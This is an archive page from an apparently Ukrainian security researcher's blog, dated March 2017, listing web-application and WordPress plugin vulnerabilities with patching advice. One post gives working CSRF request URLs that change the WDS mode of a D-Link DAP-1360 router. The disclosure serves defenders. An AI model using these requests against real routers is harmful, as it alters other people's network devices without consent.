Архів для категорії 'Уразливості'

Добірка уразливостей

16:22 31.03.2017

В даній добірці уразливості в веб додатках:

Уразливості в плагінах для WordPress №247

20:09 30.03.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Monetize, Video Gallery, WP Symposium, iframe, OAuth2 Complete. Для котрих з’явилися експлоіти.

  • WordPress Monetize 1.03 Cross Site Request Forgery / Cross Site Scripting (деталі)
  • WordPress Video Gallery 2.7 SQL Injection (деталі)
  • WordPress WP Symposium 15.1 SQL Injection (деталі)
  • WordPress iframe 3.0 Stored Cross Site Scripting (деталі)
  • WordPress OAuth2 Complete 3.1.3 Insecure Random (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

16:22 29.03.2017

В даній добірці уразливості в веб додатках:

Нові уразливості в Transcend Wi-Fi SD Card

23:51 28.03.2017

У травні, 10.05.2014, я знайшов Directory Traversal та Cross-Site Request Forgery уразливості в Transcend Wi-Fi SD Card. Це флешка з бездротовим доступом.

Раніше я писав про уразливості в Transcend Wi-Fi SD Card.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

Уразливості в плагінах для WordPress №246

23:55 04.03.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Recent Backups, WPTF Image Gallery, Avenir-Soft Direct Download, Bookmarkify та в WordPress. Для котрих з’явилися експлоіти.

  • WordPress Recent Backups 0.7 File Download (деталі)
  • WordPress WPTF Image Gallery 1.03 File Download (деталі)
  • WordPress 3.8.1 / 3.8.2 / 4.2.2 Cross Site Request Forgery (деталі)
  • WordPress Avenir-Soft Direct Download 1.0 XSS / CSRF (деталі)
  • WordPress Bookmarkify 2.9.2 Cross Site Request Forgery / Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

PRL і CSRF уразливості в D-Link DAP-1360

23:52 03.03.2017

Продовжуючи тему уразливостей в D-Link DAP-1360. У січні, 27.01.2016, я виявив нові уразливості в пристрої. Це Predictable Resource Location та Cross-Site Request Forgery уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router).

Predictable Resource Location (WASC-34):

Якщо використовувати D-Link DAP-1360 в якості роутера, до можливий доступ до адмінки за адресою http://dlink.ap. Дана адреса застосовується в різних пристроях D-Link з функцією роутера. Це полегшує CSRF та XSS атаки - всі, про які писав в цій та попередніх публікаціях. Бо зміна IP вже не захистить і можна віддалено проводити CSRF атаки використовуючи ім’я домену.

CSRF (WASC-09):

В розділі Wi-Fi - WDS можна змінити параметр WDS Mode:

Вимкнути - Disable:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%220%22}}

Увімкнути - Bridge mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%222%22,%22WdsPhyMode%22:%22CCK%22,%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}}

Увімкнути - Repeater mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%223%22,%22WdsPhyMode%22:%22CCK%22,%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}}

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Добірка уразливостей

17:21 03.03.2017

В даній добірці уразливості в веб додатках:

  • Outlook.com for Android fails to validate server certificates (деталі)
  • Mailman vulnerability (деталі)
  • WSO2 Identity Server multiple vulnerabilities (деталі)
  • Manage Engine Desktop Central 9 - Unauthorised administrative password reset (деталі)
  • HP Service Manager, Multiple Vulnerabilities (деталі)

Уразливості в TP-Link TL-WR841ND

23:58 02.03.2017

У грудні, 26.12.2016, я знайшов Cross-Site Scripting та Cross-Site Request Forgery уразливості в TP-Link TL-WR841N і TP-Link TL-WR841ND. Це Wireless Router і AP.

Раніше я писав про уразливості в мережевих пристроях даної компанії, зокрема в TP-Link TL-WR941N та TP-Link TL-WR841N.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

Добірка уразливостей

17:21 01.03.2017

В даній добірці уразливості в веб додатках:

  • DoS vulnerability in squid (деталі)
  • Pimcore v3.0.5 CMS - Multiple Web Vulnerabilities (деталі)
  • Sqlbuddy Directory Traversal Read Arbitrary Files Vulnerability (деталі)
  • Sqlbuddy Path Traversal Vulnerability (деталі)
  • Apache Cordova for Android - Multiple Vulnerabilities (деталі)

Уразливості в плагінах для WordPress №246

23:50 28.02.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах qTranslate, Job Manager, Filedownload, Candidate Application Form, Simple Image Manipulator. Для котрих з’явилися експлоіти.

  • WordPress qTranslate 2.5.39 Cross Site Scripting (деталі)
  • WordPress Job Manager 0.7.22 Cross Site Scripting (деталі)
  • WordPress Filedownload 1.4 Open Proxy (деталі)
  • WordPress Candidate Application Form 1.0 File Download (деталі)
  • WordPress Simple Image Manipulator 1.0 File Download (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.